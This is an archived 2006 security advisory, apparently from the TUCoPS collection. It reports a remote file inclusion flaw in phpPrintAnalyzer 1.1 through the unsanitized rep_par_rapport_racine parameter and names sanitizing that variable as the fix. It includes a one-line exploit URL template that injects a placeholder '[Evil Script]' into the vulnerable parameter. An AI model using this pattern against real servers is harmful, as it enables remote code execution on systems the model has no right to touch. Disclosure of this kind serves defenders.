TUCoPS :: Web :: PHP :: b06-4101.htm

TUCoPS :: Web :: PHP :: b06-4101.htm
phpPrintAnalyzer <= 1.1 (rep_par_rapport_racine) Remote File Inclusion Vulnerability

phpPrintAnalyzer <= 1.1 (rep_par_rapport_racine) Remote File Inclusion Vulnerability phpPrintAnalyzer <= 1.1 (rep_par_rapport_racine) Remote File Inclusion Vulnerability


---------------------------------------------------------------------------------------=0D
phpPrintAnalyzer 1.1 rep_par_rapport_racine Remote File Inclusion=0D
---------------------------------------------------------------------------------------=0D
Author   : Sh3ll=0D
Date     : 2006/04/27=0D
Location : Iran - Tehran=0D
HomePage : http://www.sh3ll.ir=0D 
Email    : sh3ll[at]sh3ll[dot]ir=0D
Critical Level : Dangerous=0D
---------------------------------------------------------------------------------------=0D
Affected Software Description:=0D
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D
 =0D
Application : phpPrintAnalyzer =0D
version     : 1.1=0D
URL : http://tpequet.free.fr/phpPrintAnalyzer=0D 
Description : =0D
=0D
phpPrintAnalyzer is a Web Application for CUPS System to Analyze =0D
the "page_log" Files and Get HTML Graphics (with JpGraph) =0D
 =0D
---------------------------------------------------------------------------------------=0D
Vulnerability:=0D
~~~~~~~~~~~~~=0D
in index.php We Found Vulnerability Script=0D
----------------------------------------index.php--------------------------------------=0D
....=0D
=0D
...=0D
---------------------------------------------------------------------------------------=0D
Exploit:=0D
~~~~~~~=0D
http://www.target.com/[phpPrintAnalyzer]/index.php?rep_par_rapport_racine=[Evil Script]=0D 
=0D
Solution:=0D
~~~~~~~~=0D
Sanitize Variabel $rep_par_rapport_racine in index.php=0D
----------------------------------------------------------------------------------------=0D
Shoutz:=0D
~~~~~~=0D
~ Special Greetz to My Best Friends Atena & N4sh3n4s=0D
~ To All My Friends in Xmors - Aria - Hackerz & Other Iranian Cyber Teams